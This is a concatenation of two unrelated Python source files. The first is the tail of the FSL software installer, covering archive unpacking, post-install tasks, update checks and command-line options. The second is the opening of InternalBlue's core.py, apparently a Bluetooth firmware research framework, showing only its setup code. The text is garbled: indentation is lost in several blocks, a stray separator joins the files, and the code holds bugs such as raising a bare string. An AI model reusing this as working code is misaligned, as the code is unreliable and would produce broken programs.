        MsgUser.debug("Setting up MATLAB")
        try:
            configure_matlab(fsldir)
        except ConfigureMatlabError, e:
            MsgUser.debug(str(e))
            raise SetupEnvironmentError(str(e))
        except ConfigureMatlabWarn, e:
            # Warning only - MATLAB may simply not be installed
            MsgUser.skipped(str(e))
class PostInstallError(Exception):
    """Raised when post-installation tasks fail."""
class InstallArchiveError(Exception):
    """Raised when unpacking/installing an FSL archive fails."""
class UnknownArchiveType(Exception):
    """Raised when an archive's compression type cannot be determined."""
def archive_type(archive):
    '''Determine file type based on extension and check
    that file looks like this file type.

    Uses the file(1) command; returns (tool, option) where tool is
    'tar' or 'zip' and option is the matching decompression flag.
    Raises UnknownArchiveType when the type cannot be identified.
    '''
    archive_types = {
        'gzip': ('tar', '-z'),
        'bzip2': ('tar', '-j'),
        'zip': ('zip', ''), }
    try:
        file_type = run_cmd("file %s" % (archive))
    except RunCommandError, e:
        raise UnknownArchiveType(str(e))
    file_type = file_type.lower()
    for f_type in ('gzip', 'bzip2', 'zip', ):
        if f_type in file_type:
            return archive_types[f_type]
    raise UnknownArchiveType(archive)
def post_install(
        fsldir, settings, script="post_install.sh", quiet=False,
        app_links=False, x11=False):
    """Run post-installation tasks: the bundled post-install script,
    optional X11 check and (macOS) /Applications link creation.

    Raises PostInstallError when the target is unwritable or the
    post-install script fails.
    """
    MsgUser.message("Performing post install tasks")
    if is_writeable(fsldir):
        as_root = False
    elif is_writeable_as_root(fsldir):
        as_root = True
    else:
        raise PostInstallError(
            "Unable to write to target folder (%s)" % (fsldir))
    install_installer(fsldir)
    script_path = os.path.join(fsldir, Settings.post_inst_dir, script)
    if x11:
        try:
            check_X11(settings.x11)
        except CheckX11Warning, e:
            # X11 problems are non-fatal - GUIs just won't work
            MsgUser.warning(str(e))
        else:
            MsgUser.ok("X11 (required for GUIs) found")
    if os.path.exists(script_path):
        MsgUser.debug("Found post-install script %s" % (script_path))
        if not os.access(script_path, os.X_OK):
            raise PostInstallError(
                "Unable to run post install script %s" % (script_path)
            )
        script_opts = '-f "%s"' % (fsldir)
        if quiet:
            script_opts += " -q"
        command_line = " ".join((script_path, script_opts))
        try:
            run_cmd_displayoutput(command_line, as_root=as_root)
        except RunCommandError, e:
            raise PostInstallError(
                "Error running post installation script (error %s)"
                " - check the install log" % (str(e))
            )
        # Work around for mistake in 5.0.10 post setup script:
        # it shipped make_applications_links.sh but forgot to call it.
        mal = os.path.join(
            fsldir, Settings.post_inst_dir,
            'make_applications_links.sh')
        if (os.path.exists(mal) and
                not file_contains(script_path, "make_applications_links.sh")):
            MsgUser.debug(
                "Work around necessary for missing app link creation")
        else:
            # Script already handles links (or none shipped) - don't
            # do it again here.
            app_links = False
        if app_links:
            try:
                make_applications_links(fsldir, settings.applications)
            except MakeApplicationLinksError, e:
                # Report per-application failures but keep going
                for message in e.app_messages.values():
                    MsgUser.warning(message)
            else:
                MsgUser.ok("/Applications links created/updated")
    MsgUser.ok("Post installation setup complete")
def install_archive(archive, fsldir=None):
    """Unpack the FSL *archive* into place at *fsldir*.

    Unpacks into a temporary sibling folder, optionally backs up or
    deletes an existing install, then moves the new tree into place.
    Returns the final fsldir.  Raises InstallError/InstallArchiveError
    on failure.
    """
    def clean_up_temp():
        # Best-effort removal of the temporary unpack folder.
        try:
            safe_delete(tempfolder, as_root)
        except SafeDeleteError, sd_e:
            MsgUser.debug(
                "Unable to clean up temporary folder! "
                "%s" % (str(sd_e)))
    if not os.path.isfile(archive):
        raise InstallError("%s isn't a file" % (archive))
    if not fsldir:
        try:
            fsldir = get_fsldir(specified_dir=fsldir, install=True)
        except GetFslDirError, e:
            raise InstallError(str(e))
    MsgUser.debug("Requested install of %s as %s" % (archive, fsldir))
    if os.path.exists(fsldir):
        # move old one out of way
        MsgUser.debug("FSL version already installed")
        keep_old = Settings.inst_qus.ask_question('del_old')
    else:
        keep_old = False
    install_d = os.path.dirname(fsldir)
    MsgUser.debug("Checking %s is writeable." % (install_d))
    if is_writeable(install_d):
        as_root = False
    elif is_writeable_as_root(install_d):
        as_root = True
    else:
        raise InstallArchiveError(
            "Unable to write to target folder (%s), "
            "even as a super user." % (install_d))
    MsgUser.debug("Does %s require root for deletion? %s" % (
        install_d, as_root))
    try:
        unarchive, ua_option = archive_type(archive)
    except UnknownArchiveType, e:
        raise InstallArchiveError(str(e))
    # Generate a temporary name - eg fsl-<mypid>-date
    tempname = '-'.join(('fsl', str(os.getpid()), str(time.time())))
    tempfolder = os.path.join(install_d, tempname)
    try:
        run_cmd_dropstdout("mkdir %s" % (tempfolder), as_root=as_root)
    except RunCommandError, e:
        raise InstallArchiveError(
            "Unable to create folder to install into.")
    MsgUser.debug(
        "Unpacking %s into folder %s." % (archive, tempfolder))
    try:
        if unarchive == 'tar':
            unpack_cmd = 'tar -C %s -x %s -o -f %s' % (
                tempfolder, ua_option, archive)
        elif unarchive == 'zip':
            MsgUser.debug(
                "Calling unzip %s %s" % (ua_option, archive)
            )
            unpack_cmd = 'unzip %s %s' % (ua_option, archive)
        try:
            run_cmd_dropstdout(unpack_cmd, as_root=as_root)
        except RunCommandError, e:
            # NOTE(review): InstallArchiveError is not caught by the
            # enclosing 'except InstallError' below, so the temp folder
            # is not cleaned up on unpack failure - TODO confirm intent.
            raise InstallArchiveError("Unable to unpack FSL.")
        new_fsl = os.path.join(tempfolder, 'fsl')
        if os.path.exists(fsldir):
            # move old one out of way
            try:
                old_version = get_installed_version(fsldir)
            except (NotAFslVersion, GetInstalledVersionError), e:
                # NOTE(review): if the version can't be read and
                # keep_old is False, old_version stays unbound and the
                # join below would raise NameError - TODO confirm.
                if keep_old:
                    old_version = Version('0.0.0')
                    MsgUser.warning(
                        "The contents of %s doesn't look like an "
                        "FSL installation! - "
                        "moving to fsl-0.0.0" % (fsldir))
            old_fsl = '-'.join((fsldir, str(old_version)))
            if os.path.exists(old_fsl):
                MsgUser.debug(
                    "Looks like there is another copy of the "
                    "old version of FSL - deleting...")
                try:
                    safe_delete(old_fsl, as_root)
                except SafeDeleteError, e:
                    raise InstallError(
                        ";".join((
                            "Install location already has a "
                            "%s - I've tried to delete it but"
                            " failed" % (old_fsl), str(e))))
            if keep_old:
                try:
                    MsgUser.debug(
                        "Moving %s to %s" % (fsldir, old_fsl))
                    move(fsldir, old_fsl, as_root)
                    MsgUser.message(
                        '''You can find your archived version of FSL in %s.
If you wish to restore it, remove %s and rename %s to %s''' % (
                            old_fsl, fsldir, old_fsl, fsldir))
                except MoveError, mv_e:
                    # failed to move the old version
                    MsgUser.debug(
                        "Failed to move old version "
                        "- %s" % (str(mv_e)))
                    raise InstallError(
                        "Failed to backup old version (%s)" % (str(mv_e)))
            else:
                MsgUser.debug("Removing existing FSL install")
                try:
                    safe_delete(fsldir, as_root)
                    MsgUser.debug("Deleted %s." % (fsldir))
                except SafeDeleteError, e:
                    raise InstallError(
                        "Failed to delete %s - %s." % (fsldir, str(e)))
        else:
            old_fsl = ''
        try:
            MsgUser.debug("Moving %s to %s" % (new_fsl, fsldir))
            move(new_fsl, fsldir, as_root)
        except MoveError, e:
            # Unable to move new install into place
            MsgUser.debug(
                "Move failed - %s." % (str(e)))
            raise InstallError(
                'Failed to move new version into place.')
    except InstallError, e:
        clean_up_temp()
        raise InstallArchiveError(str(e))
    clean_up_temp()
    MsgUser.debug("Install complete")
    MsgUser.ok("FSL software installed.")
    return fsldir
def check_for_updates(url, fsldir, requested_v=None):
    # Start an update
    """Compare the installed FSL version with the (latest or requested)
    web version.

    Returns (UPDATE, version) for a same-major update, (UPGRADE, version)
    for a major-version jump, or (CURRENT, None) when up to date.
    Raises InstallError when no installed version can be determined.
    """
    MsgUser.message("Looking for new version.")
    try:
        this_version = get_installed_version(fsldir)
    except GetInstalledVersionError, e:
        # We can't find an installed version of FSL!
        raise InstallError(str(e))
    else:
        MsgUser.debug("You have version %s" % (this_version))
        if not requested_v:
            version = Version(latest_release(url)['version'])
        else:
            try:
                version = Version(requested_v)
            except NotAFslVersion:
                raise InstallError(
                    "%s doesn't look like a version" % requested_v)
        if version > this_version:
            # Update Available
            if version.major > this_version.major:
                # We don't support patching between major
                # versions so download a fresh copy
                return (UPGRADE, version)
            else:
                return (UPDATE, version)
        else:
            return (CURRENT, None)
class MakeApplicationLinksError(Exception):
    """Raised when one or more /Applications symlinks could not be made.

    The first positional argument, when supplied, is exposed as
    ``app_messages`` (a mapping of application -> failure description);
    with no arguments ``app_messages`` is an empty list.
    """
    def __init__(self, *args):
        super(MakeApplicationLinksError, self).__init__(*args)
        if args:
            self.app_messages = args[0]
        else:
            self.app_messages = []
def make_applications_links(fsldir, apps):
'''Create symlinks in /Applications'''
MsgUser.message("Creating Application links...")
results = {}
for app in apps:
app_location = os.path.join('/Applications', os.path.basename(app))
app_target = os.path.join(fsldir, app)
create_link = True
MsgUser.debug("Looking for existing link %s" % (app_location))
if os.path.lexists(app_location):
MsgUser.debug(
"Is a link: %s; realpath: %s" % (
os.path.islink(app_location),
os.path.realpath(app_location)))
if os.path.islink(app_location):
MsgUser.debug("A link already exists.")
if os.path.realpath(app_location) != app_target:
MsgUser.debug(
"Deleting old (incorrect) link %s" % (app_location))
try:
run_cmd_dropstdout("rm " + app_location, as_root=True)
except RunCommandError, e:
MsgUser.debug(
"Unable to remove broken"
" link to %s (%s)." % (app_target, str(e)))
results[app] = 'Unable to remove broken link to %s' % (
app_target)
create_link = False
else:
MsgUser.debug("Link is correct, skipping.")
create_link = False
else:
MsgUser.debug(
"%s doesn't look like a symlink, "
"so let's not delete it." % (app_location))
results[app] = (
"%s is not a link so hasn't been updated to point at the "
"new FSL install.") % (app_location)
create_link = False
if create_link:
MsgUser.debug('Create a link for %s' % (app))
if os.path.exists(app_target):
try:
run_cmd_dropstdout(
"ln -s %s %s" % (app_target, app_location),
as_root=True)
except RunCommandError, e:
MsgUser.debug(
"Unable to create link to %s (%s)." % (
app_target, str(e)))
results[app] = (
'Unable to create link to %s.') % (app_target)
else:
MsgUser.debug(
'Unable to find application'
' %s to link to.') % (app_target)
if results:
raise MakeApplicationLinksError(results)
class CheckX11Warning(Exception):
    """Non-fatal: X11 is missing, unidentifiable or a known-bad version."""
def check_X11(x11):
    '''Function to find X11 install on Mac OS X and confirm it is compatible.
    Advise user to download Xquartz if necessary.

    x11 -- dict with keys 'apps', 'location', 'bad_versions' and
    'download_url' (see Settings.x11).  Raises CheckX11Warning for any
    non-fatal problem; returns None when X11 looks fine.
    '''
    MsgUser.message(
        "Checking for X11 windowing system (required for FSL GUIs).")
    xbin = ''
    # Look for any of the known X11 app bundles
    for x in x11['apps']:
        if os.path.exists(os.path.join(x11['location'], x)):
            xbin = x
    if xbin != '':
        # Find out what version is installed via Spotlight metadata
        x_v_cmd = [
            '/usr/bin/mdls', '-name',
            'kMDItemVersion', os.path.join(x11['location'], xbin)]
        try:
            cmd = Popen(x_v_cmd, stdout=PIPE, stderr=STDOUT)
            (vstring, _) = cmd.communicate()
        except Exception, e:
            raise CheckX11Warning(
                "Unable to check X11 version (%s)" % (str(e)))
        if cmd.returncode:
            MsgUser.debug("Error finding the version of X11 (%s)" % (vstring))
            # App found, but can't tell version, warn the user
            raise CheckX11Warning(
                "X11 (required for FSL GUIs) is installed but I"
                " can't tell what the version is.")
        else:
            # Returns:
            # kMDItemVersion = "2.3.6"\n
            (_, _, version) = vstring.strip().split()
            if version.startswith('"'):
                # Strip the surrounding quotes
                version = version[1:-1]
            if version in x11['bad_versions']:
                raise CheckX11Warning(
                    "X11 (required for FSL GUIs) is a version that"
                    " is known to cause problems. We suggest you"
                    " upgrade to the latest XQuartz release from "
                    "%s" % (x11['download_url']))
            else:
                MsgUser.debug(
                    "X11 found and is not a bad version"
                    " (%s: %s)." % (xbin, version))
    else:
        # No X11 found, warn the user
        raise CheckX11Warning(
            "The FSL GUIs require the X11 window system which I can't"
            " find in the usual places. You can download a copy from %s"
            " - you will need to install this before the GUIs will"
            " function" % (x11['download_url']))
def do_install(options, settings):
MsgUser.message(
shell_colours.bold + settings.title + shell_colours.default)
if options.test_installer:
settings.main_mirror = options.test_installer
this_computer = Host
if not this_computer.supported:
MsgUser.debug("Unsupported host %s %s %s" % (
this_computer.o_s,
this_computer.arch,
this_computer.os_type))
raise InstallError(
"Unsupported host - you could try building from source")
if this_computer.o_s == "linux":
system_environment = True
with_matlab = False
application_links = False
x11 = False
elif this_computer.o_s == "darwin":
system_environment = False
with_matlab = True
application_links = True
x11 = True
else:
MsgUser.debug("Unrecognised OS %s" % (this_computer.o_s))
raise InstallError("Unrecognised OS")
my_uid = os.getuid()
def configure_environment(fsldir, env_all=False, skip=False, matlab=False):
if skip:
return
if env_all:
if system_environment:
# Setup the system-wise environment
try:
setup_system_environment(fsldir)
except SetupEnvironmentError, e:
MsgUser.debug(str(e))
MsgUser.failed(
"Failed to configure system-wide profiles "
"with FSL settings: %s" % (str(e)))
except SetupEnvironmentSkip, e:
MsgUser.skipped(
"Some shells already configured: %s" % (str(e)))
else:
MsgUser.debug("System-wide profiles setup.")
MsgUser.ok("System-wide FSL configuration complete.")
else:
MsgUser.skipped(
"System-wide profiles not supported on this OS")
elif my_uid != 0:
# Setup the environment for the current user
try:
setup_environment(fsldir, with_matlab=matlab)
except SetupEnvironmentError, e:
MsgUser.debug(str(e))
MsgUser.failed(str(e))
else:
MsgUser.ok(
"User profile updated with FSL settings, you will need "
"to log out and back in to use the FSL tools.")
if my_uid != 0:
if options.quiet:
settings.inst_qus.defaults = True
print '''
We may need administrator rights, but you have specified fully automated
mode - you may still be asked for an admin password if required.'''
print '''
To install fully automatedly, either ensure this is running as the root
user (use sudo) or that you can write to the folder you wish to install
FSL in.'''
elif (not options.download and
not options.list_versions and
not options.get_source and
not options.get_feeds):
MsgUser.warning(
'''Some operations of the installer require administative rights,
for example installing into the default folder of /usr/local.
If your account is an 'Administrator' (you have 'sudo' rights)
then you will be prompted for your administrator password
when necessary.''')
if not options.d_dir and options.quiet:
raise InstallError(
"Quiet mode requires you to specify the install location"
" (e.g. /usr/local)")
if not options.quiet and not options.list_versions:
MsgUser.message(
"When asked a question, the default answer is given in square "
"brackets.\nHit the Enter key to accept this default answer.")
if options.env_only and my_uid != 0:
configure_environment(
get_fsldir(specified_dir=options.d_dir),
options.env_all)
return
if options.archive:
if not options.skipchecksum:
if not options.checksum:
raise InstallError(
"No checksum provided and checking not disabled")
else:
checksummer = globals()[options.checksum_type + 'File']
if options.checksum != checksummer(options.archive):
raise InstallError("FSL archive doesn't match checksum")
else:
MsgUser.ok("FSL Package looks good")
arc_version = archive_version(options.archive)
MsgUser.message(
"Installing FSL software version %s..." % (arc_version))
fsldir = install_archive(
archive=options.archive, fsldir=options.d_dir)
try:
post_install(fsldir=fsldir, settings=settings, quiet=options.quiet)
except PostInstallError, e:
raise InstallError(str(e))
configure_environment(
fsldir=fsldir, env_all=options.env_all,
skip=options.skip_env, matlab=with_matlab)
return
# All the following options require the Internet...
try:
settings.mirror = fastest_mirror(
settings.mirrors, settings.mirrors_file)
except SiteNotResponding, e:
# We can't find the FSL site - possibly the internet is down
raise InstallError(e)
try:
self_update(settings.mirror)
except SelfUpdateError, e:
MsgUser.debug("Self update error: %s" % (str(e)))
MsgUser.warning("Error checking for updates to installer - continuing")
if options.list_versions:
# Download a list of available downloads from the webserver
list_releases(settings.mirror)
return
if options.download:
MsgUser.debug("Attempting to download latest release")
try:
download_release(request_version=options.requestversion,
skip_verify=options.skipchecksum)
except DownloadFileError, e:
raise("Unable to download release %s" % (str(e)))
return
if options.update:
fsldir = get_fsldir()
status, new_v = check_for_updates(settings.mirror, fsldir=fsldir)
if status == UPDATE:
MsgUser.ok("Version %s available." % new_v)
if not settings.inst_qus.ask_question('update'):
return
elif status == UPGRADE:
MsgUser.ok("Version %s available." % new_v)
if not settings.inst_qus.ask_question('upgrade'):
return
else:
MsgUser.ok("FSL is up-to-date.")
return
if options.get_source:
MsgUser.debug("Attempting to download source")
try:
download_release(
request_version=options.requestversion,
skip_verify=options.skipchecksum,
source_code=True)
except DownloadFileError, e:
raise("Unable to download source code %s" % (str(e)))
return
if options.get_feeds:
MsgUser.debug("Attempting to download FEEDS")
try:
download_release(
request_version=options.requestversion,
skip_verify=options.skipchecksum,
feeds=True)
except DownloadFileError, e:
raise("Unable to download FEEDS %s" % (str(e)))
return
try:
(version, details) = get_web_version_and_details(
request_version=options.requestversion
)
if 'redirect' in details:
MsgUser.message("Please download FSL using the instructions here:")
MsgUser.message("%s" % (details['redirect']))
return
fsldir = get_fsldir(specified_dir=options.d_dir, install=True)
reinstall = True
if os.path.exists(fsldir):
inst_version = get_installed_version(fsldir)
if inst_version == version:
reinstall = Settings.inst_qus.ask_question('version_match')
if reinstall:
(fname, version, details) = download_release(
to_temp=True,
request_version=options.requestversion,
skip_verify=options.skipchecksum)
if not details['supported']:
MsgUser.debug(
"This OS is not officially supported -"
" you may experience issues"
)
MsgUser.debug(
"Installing %s from %s (details: %s)" % (
fname, version, details))
MsgUser.message(
"Installing FSL software version %s..." % (version))
install_archive(
archive=fname, fsldir=fsldir)
try:
safe_delete(fname)
except SafeDeleteError, e:
MsgUser.debug(
"Unable to delete downloaded package %s ; %s" % (
fname, str(e)))
if details['notes']:
MsgUser.message(details['notes'])
try:
post_install(
fsldir=fsldir, settings=settings,
quiet=options.quiet, x11=x11,
app_links=application_links)
except PostInstallError, e:
raise InstallError(str(e))
except DownloadError, e:
MsgUser.debug("Unable to download FSL %s" % (str(e)))
raise InstallError("Unable to download FSL")
except InstallArchiveError, e:
MsgUser.debug("Unable to unpack FSL ; %s" % (str(e)))
raise InstallError("Unable to unpack FSL - %s" % (str(e)))
configure_environment(
fsldir=fsldir, env_all=options.env_all,
skip=options.skip_env, matlab=with_matlab)
if details['notes']:
MsgUser.message(details['notes'])
def parse_options(args):
    """Build the fslinstaller option parser and parse *args*.

    Returns the (options, arguments) pair produced by optparse.
    """
    usage = "usage: %prog [options]"
    ver = "%%prog %s" % (version)
    parser = OptionParser(usage=usage, version=ver)
    # --- basic options -----------------------------------------------------
    parser.add_option(
        "-d", "--dest", dest="d_dir", metavar="DESTDIR",
        action="store", type="string",
        help="Install into folder given by DESTDIR - "
             "e.g. /usr/local/fsl")
    parser.add_option(
        "-e", dest="env_only", action="store_true",
        help="Only setup/update your environment")
    parser.add_option(
        "-E", dest="env_all", action="store_true",
        help="Setup/update the environment for ALL users")
    parser.add_option(
        "-v", action="version",
        help="Print version number and exit")
    parser.add_option(
        "-c", "--checkupdate", dest='update', action="store_true",
        help="Check for FSL updates -"
             " needs an internet connection")
    parser.add_option(
        "-o", "--downloadonly", dest="download", action="store_true",
        help=SUPPRESS_HELP)
    # --- advanced options --------------------------------------------------
    advanced = OptionGroup(
        parser, "Advanced Install Options",
        "These are advanced install options")
    advanced.add_option(
        "-l", "--listversions", dest="list_versions", action="store_true",
        help="List available versions of FSL")
    advanced.add_option(
        "-V", "--fslversion", dest="requestversion", metavar="FSLVERSION",
        action="store", type="string",
        help="Download the specific version FSLVERSION of FSL")
    advanced.add_option(
        "-s", "--source", dest="get_source", action="store_true",
        help="Download source code for FSL")
    advanced.add_option(
        "-F", "--feeds", dest="get_feeds", action="store_true",
        help="Download FEEDS")
    advanced.add_option(
        "-q", "--quiet", dest='quiet', action="store_true",
        help="Silence all messages - useful if scripting install")
    advanced.add_option(
        "-p", dest="skip_env", action="store_true",
        help="Don't setup the environment")
    parser.add_option_group(advanced)
    # --- debugging options -------------------------------------------------
    debugging = OptionGroup(
        parser, "Debugging Options",
        "These are for use if you have a problem running this installer.")
    debugging.add_option(
        "-f", "--file", dest="archive", metavar="ARCHIVEFILE",
        action="store", type="string",
        help="Install a pre-downloaded copy of the FSL archive")
    debugging.add_option(
        "-C", "--checksum", dest="checksum", metavar="CHECKSUM",
        action="store", type="string",
        help="Supply the expected checksum for the pre-downloaded FSL archive")
    debugging.add_option(
        "-T", "--checksum-type", dest="checksum_type", default="sha256",
        action="store", type="string",
        help="Specify the type of checksum")
    debugging.add_option(
        "-M", "--nochecksum", dest="skipchecksum", action="store_true",
        help="Don't check the pre-downloaded FSL archive")
    debugging.add_option(
        "-D", dest="verbose", action="store_true",
        help="Switch on debug messages")
    debugging.add_option(
        "-G", dest="test_installer", action="store", type="string",
        help=SUPPRESS_HELP)
    debugging.add_option(
        "-w", dest="test_csv", action="store_true",
        help=SUPPRESS_HELP)
    parser.add_option_group(debugging)
    return parser.parse_args(args)
if __name__ == '__main__':
    # Entry point: parse CLI flags, configure message verbosity, then run
    # the installer. NOTE: this file is Python 2 only (`print` statement,
    # `except X, e` syntax).
    (options, args) = parse_options(sys.argv[1:])
    if options.verbose:
        MsgUser.debugOn()
        print options
    if options.quiet:
        MsgUser.quietOn()
    if options.test_csv:
        # Force the CSV fallback code path (test hook, hidden -w flag)
        HAS_JSON = False
    installer_settings = Settings()
    try:
        do_install(options, installer_settings)
    except BadVersion, e:
        # Requested FSL version does not exist on the server
        MsgUser.debug(str(e))
        MsgUser.failed("Unable to find requested version!")
        sys.exit(1)
    except (InstallError, GetFslDirError, GetInstalledVersionError), e:
        MsgUser.failed(str(e))
        sys.exit(1)
    except UnsupportedOs, e:
        MsgUser.failed(str(e))
        sys.exit(1)
    except KeyboardInterrupt, e:
        # User pressed Ctrl-C: print a newline so the failure message
        # starts on its own line
        MsgUser.message('')
        MsgUser.failed("Install aborted.")
        sys.exit(1)
|
core.py | #!/usr/bin/env python2
# core.py
#
# This file contains the main class of the framework which
# includes the thread functions for the receive and send thread.
# It also implements methods to setup the TCP connection to the
# Android Bluetooth stack via ADB port forwarding
#
# Copyright (c) 2020 The InternalBlue Team. (MIT License)
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the "Software"), to deal in
# the Software without restriction, including without limitation the rights to
# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
# the Software, and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
# - The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
# - The Software is provided "as is", without warranty of any kind, express or
# implied, including but not limited to the warranties of merchantability,
# fitness for a particular purpose and noninfringement. In no event shall the
# authors or copyright holders be liable for any claim, damages or other
# liability, whether in an action of contract, tort or otherwise, arising from,
# out of or in connection with the Software or the use or other dealings in the
# Software.
from __future__ import division
import socket
import struct
from future import standard_library
import pwnlib
from pwnlib.asm import asm
from pwnlib.exception import PwnlibException
from pwnlib.util.fiddling import bits, unbits
from .utils.pwnlib_wrapper import p16, p8, u32, u16, p32, log, context, flat
from .fw import FirmwareDefinition
standard_library.install_aliases()
from builtins import hex
from builtins import str
from builtins import range
from builtins import object
from past.utils import old_div
from abc import ABCMeta, abstractmethod
from .fw.fw import Firmware
import datetime
import time
import queue as queue2k
from . import hci
from .objects.queue_element import QueueElement
from .objects.connection_information import ConnectionInformation
from future.utils import with_metaclass
from internalblue.utils import bytes_to_hex
from internalblue.hci import HCI, HCI_COMND
try:
from typing import (
List,
Optional,
Any,
TYPE_CHECKING,
Tuple,
Union,
NewType,
Callable,
cast,
)
from internalblue import (
Address,
Record,
Task,
HCI_CMD,
FilterFunction,
ConnectionNumber,
ConnectionDict,
ConnectionIndex,
BluetoothAddress,
HeapInformation,
QueueInformation,
Opcode,
)
from . import DeviceTuple
if TYPE_CHECKING:
pass
except:
pass
# import logging
# log = logging.getLogger(__name__)
class InternalBlue(with_metaclass(ABCMeta, object)):
def __init__(
    self,
    queue_size: int = 1000,
    btsnooplog_filename: str = "btsnoop.log",
    log_level: str = "info",
    fix_binutils: bool = True,
    data_directory: str = ".",
    replay: bool = False,
) -> None:
    """
    Initialize framework state. No connection is established here; call
    connect() afterwards.

    :param queue_size: maximum number of pending entries in the send queue.
    :param btsnooplog_filename: file (inside data_directory) that receives
        all incoming HCI packets; pass None to disable btsnoop logging.
    :param log_level: pwnlib context log level (e.g. "info", "debug").
    :param fix_binutils: attempt to fix pwntools' ARM binutils lookup if it
        is broken (see check_binutils()).
    :param data_directory: directory for log files and capture dumps.
    :param replay: True if the --replay flag was used and a chip is spoofed.
    """
    context.log_level = log_level
    context.log_file = data_directory + "/_internalblue.log"
    context.arch = "thumb"
    self.interface = None  # holds the context.device / hci interaface which is used to connect, is set in cli
    self.fw: FirmwareDefinition = None  # holds the firmware file
    self.data_directory = data_directory
    self.s_inject = (
        None
    )  # type: socket.socket # This is the TCP socket to the HCI inject port
    self.s_snoop = (
        None
    )  # type: socket.socket # This is the TCP socket to the HCI snoop port
    # If btsnooplog_filename is set, write all incomming HCI packets to a file (can be viewed in wireshark for debugging)
    if btsnooplog_filename is not None:
        self.write_btsnooplog = True
        self.btsnooplog_file = open(
            self.data_directory + "/" + btsnooplog_filename, "wb"
        )
    else:
        self.write_btsnooplog = False
    # The sendQueue connects the core framework to the sendThread. With the
    # function sendH4 or sendHciCommand, the core framework (or a CLI command / user script)
    # can put an H4 packet or HCI Command into this queue. The queue entry should be a tuple:
    #   (h4type, data, response_queue, response_hci_filter_function)
    #    - h4type: The H4 packet type (e.g. 1 for HCI Command or 7 for Broadcom Diagnostic)
    #    - data: The H4 payload (byte string)
    #    - response_queue: queue that is used for delivering the H4 response
    #      back to the entity that put the H4 command into the
    #      sendQueue. May be None if no response is expected/needed.
    #      If a response_queue is specified, it is also necessary to
    #      specify a response_hci_filter_function.
    #    - response_hci_filter_function: An hci callback function (see registerHciCallback())
    #      that is used to test whether incomming H4 packets are the
    #      response to the packet that was sent. May be None if response_queue
    #      is also None.
    # The sendThread polls the queue, gets the above mentioned tuple, sends the
    # H4 command to the firmware and then waits for the response from the
    # firmware (the response is recognized with the help of the filter function).
    # Once the response arrived, it puts the response into the response_queue from
    # the tuple. See sendH4() and sendHciCommand().
    self.sendQueue = queue2k.Queue(queue_size)  # type: queue2k.Queue[Task]
    self.recvThread: Optional[
        pwnlib.context.Thread
    ] = None  # The thread which is responsible for the HCI snoop socket
    self.sendThread: Optional[
        pwnlib.context.Thread
    ] = None  # The thread which is responsible for the HCI inject socket
    self.tracepoints = []  # A list of currently active tracepoints
    # The list contains tuples:
    #   [0] target address
    #   [1] address of the hook code
    self.tracepoint_registers: Optional[
        List[int]
    ] = None  # Last captured register values from a tracepoint
    self.tracepoint_memdump_parts = {}  # Last captured RAM dump from a tracepoint
    self.tracepoint_memdump_address = None  # Start address of the RAM dump
    # The registeredHciCallbacks list holds callback functions which are being called by the
    # recvThread once a HCI Event is being received. Use registerHciCallback() for registering
    # a new callback (put it in the list) and unregisterHciCallback() for removing it again.
    self.registeredHciCallbacks = []
    # The registeredHciRecvQueues list holds queues which are being filled by the
    # recvThread once a HCI Event is being received. Use registerHciRecvQueue() for registering
    # a new queue (put it in the list) and unregisterHciRecvQueue() for removing it again.
    # Actually the registeredHciRecvQueues holds tuples with the format: (queue, filter_function)
    # filter_function will be called for each packet that is received and only if it returns
    # True, the packet will be put into the queue. The filter_function can be None in order
    # to put all packets into the queue.
    self.registeredHciRecvQueues = (
        []
    )  # type: List[Tuple[queue2k.Queue[Record], FilterFunction]]
    self.exit_requested = False  # Will be set to true when the framework wants to shut down (e.g. on error or user exit)
    self.running = False  # 'running' is True once the connection to the HCI sockets is established
    # and the recvThread and sendThread are started (see connect() and shutdown())
    self.log_level = log_level
    self.check_binutils(
        fix_binutils
    )  # Check if ARM binutils are installed (needed for asm() and disasm())
    # If fix_binutils is True, the function tries to fix the error were
    # the binutils are installed but not found by pwntools (e.g. under Arch Linux)
    self.stackDumpReceiver = None  # This class will monitor the HCI Events and detect stack trace events.
    # Register callbacks which handle specific HCI Events:
    self.registerHciCallback(self.connectionStatusCallback)
    self.registerHciCallback(self.coexStatusCallback)
    self.registerHciCallback(self.readMemoryPoolStatisticsCallback)
    # If the --replay flag was used and a chip is spoofed.
    self.replay = replay
def check_binutils(self, fix=True):
    """
    Test if ARM binutils is in path so that asm and disasm (provided by
    pwntools) work correctly.
    It may happen, that ARM binutils are installed but not found by pwntools.
    If 'fix' is True, check_binutils will try to fix this.
    """
    # Silence pwnlib while probing for the assembler, then restore the level.
    previous_level = context.log_level
    context.log_level = "critical"
    try:
        # throws PwnlibException if as cannot be found
        pwnlib.asm.which_binutils("as")
        found = True
    except PwnlibException:
        found = False
    finally:
        context.log_level = previous_level
    if found:
        return True
    log.debug("pwnlib.asm.which_binutils() cannot find 'as'!")
    if not fix:
        return False
    # Work around for arch (with installed arm-none-eabi-binutils)
    import os
    from glob import glob

    def which_binutils_fixed(tool):
        # Scan every PATH entry for an arm-*-<tool> binary.
        pattern = "arm-*-%s" % tool
        for directory in os.environ["PATH"].split(":"):
            matches = sorted(glob(os.path.join(directory, pattern)))
            if matches:
                return matches[0]
        raise PwnlibException("Could not find tool %s." % tool)

    try:
        which_binutils_fixed("as")
    except PwnlibException:
        log.warn(
            "pwntools cannot find binutils for arm architecture. Disassembling will not work!"
        )
        return False
    # yeay it worked! fix it in pwnlib:
    pwnlib.asm.which_binutils = which_binutils_fixed
    log.debug("installing workaround for pwnlib.asm.which_binutils() ...")
    return True
def _parse_time(self, time):
# type: (Any) -> datetime.datetime
"""
Taken from: https://github.com/joekickass/python-btsnoop
Record time is a 64-bit signed integer representing the time of packet arrival,
in microseconds since midnight, January 1st, 0 AD nominal Gregorian.
In order to avoid leap-day ambiguity in calculations, note that an equivalent
epoch may be used of midnight, January 1st 2000 AD, which is represented in
this field as 0x00E03AB44A676000.
"""
time_betw_0_and_2000_ad = int("0x00E03AB44A676000", 16)
time_since_2000_epoch = datetime.timedelta(
microseconds=time
) - datetime.timedelta(microseconds=time_betw_0_and_2000_ad)
return datetime.datetime(2000, 1, 1) + time_since_2000_epoch
@abstractmethod
def _recvThreadFunc(self):
    # type: () -> None
